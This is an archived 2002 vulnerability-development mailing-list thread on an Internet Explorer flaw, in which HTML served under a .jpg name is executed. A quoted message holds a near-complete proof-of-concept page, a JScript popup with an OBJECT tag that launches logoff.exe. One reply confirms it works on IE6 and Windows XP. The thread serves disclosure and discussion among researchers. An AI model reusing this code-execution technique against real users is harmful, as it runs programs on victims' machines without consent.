Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: "foo BAR" <int0x80 () hotmail com>
Date: Wed, 13 Mar 2002 03:21:16 +0000
You have to paste in the whole code. Maybe your email filters it out? On hotmail it just appears as function Filtered() { return 0; } in the source code. However in the reply it was printed fine. Look at the bottom, it should be printed fine.
From: "Jon Zobrist" <kgb () ussr com> To: "Magnus Bodin" <magnus () bodin org>, <vuln-dev () securityfocus com> Subject: Re: Rather large MSIE-hole Date: Tue, 12 Mar 2002 12:50:04 -0700 MIME-Version: 1.0Received: from [66.38.151.27] by hotmail.com (3.2) with ESMTP id MHotMailBE580BF100B9400431514226971B917F0; Tue, 12 Mar 2002 19:01:13 -0800 Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])by outgoing.securityfocus.com (Postfix) with QMQPid 46396A5884; Tue, 12 Mar 2002 13:09:25 -0700 (MST)Received: (qmail 28250 invoked from network); 12 Mar 2002 19:53:20 -0000 From vuln-dev-return-3096-int0x80 Tue, 12 Mar 2002 19:01:54 -0800 Mailing-List: contact vuln-dev-help () securityfocus com; run by ezmlm Precedence: bulk List-Id: <vuln-dev.list-id.securityfocus.com> List-Post: <mailto:vuln-dev () securityfocus com> List-Help: <mailto:vuln-dev-help () securityfocus com> List-Unsubscribe: <mailto:vuln-dev-unsubscribe () securityfocus com> List-Subscribe: <mailto:vuln-dev-subscribe () securityfocus com> Delivered-To: mailing list vuln-dev () securityfocus com Delivered-To: moderator for vuln-dev () securityfocus com Message-ID: <001501c1c9ff$6d2613e0$6a01010a () bluffdale iaccess com> References: <20020312103220.GM29695 () bodin org> X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 I copied the included text, pasted it into bad.jpg on my apache box, called the page from my IE and got the message You should feel lucky if you dont have XP right now. I'm running Windows XP Pro, IE Version 6.0.2600.0000.xpclient.010817-1148 Installed patches/hotfixes: Windows XP Application Compatibality Update[Q313484] Windows XP Hotfixes for Q307869, Q308210, Q309521, Q309691, Q310437, Q311889, Q314147, Q3150000 -Jon Zobrist, CISSP ----- Original Message ----- From: "Magnus Bodin" <magnus () bodin org> To: <vuln-dev () securityfocus com> Sent: Tuesday, March 12, 2002 3:32 AM Subject: Rather large MSIE-hole > > The latest MSIE-hole is now spreading. > > THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the > Content-Type if it "thinks" it knows better, then the code is executed.> This in combination with the malicious code that is possible to run, then> an "innocent.jpg" with the following content will log off an XP-user. > > --%< cut here----- > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> > <HTML> > <HEAD> > <TITLE>IE6 security...</TITLE> > > <META http-equiv=Content-Type content="text/html; charset=windows-1252"> > <SCRIPT language=JScript> > > var programName=new Array( > 'c:/windows/system32/logoff.exe', > 'c:/winxp/system32/logoff.exe', > 'c:/winnt/system32/logoff.exe' > ); > > function Init(){ > var oPopup=window.createPopup(); > var oPopBody=oPopup.document.body; > var n,html=''; > for(n=0;n<programName.length;n++) > html+="<OBJECT NAME='X' > CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C > oPopBody.innerHTML=html; > oPopup.show(290, 390, 200, 200, document.body); > } > > </SCRIPT> > </head> > <BODY onload="Init()"> > You should feel lucky if you dont have XP right now. > </BODY> > </HTML> > --%< cut here----- > > > -- > magnus MICROS~1 BOB was written in Lisp. > http://x42.com/ >
_________________________________________________________________ Send and receive Hotmail on your mobile device: http://mobile.msn.com
Current thread:
- Re: Rather large MSIE-hole, (continued)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 13)
- Re: Rather large MSIE-hole methodic (Mar 14)
- Re: Rather large MSIE-hole Felipe Franciosi (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole NyQuist (Mar 13)
- Re: Rather large MSIE-hole Magnus Bodin (Mar 12)
- Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this) David Barnett (Mar 16)
- Re: Rather large MSIE-hole Raul Dias (Mar 13)
- Re: Rather large MSIE-hole Syzop (Mar 14)
- RE: Rather large MSIE-hole Ryan Sweat (Mar 14)
- Re: Rather large MSIE-hole Keegan (Mar 14)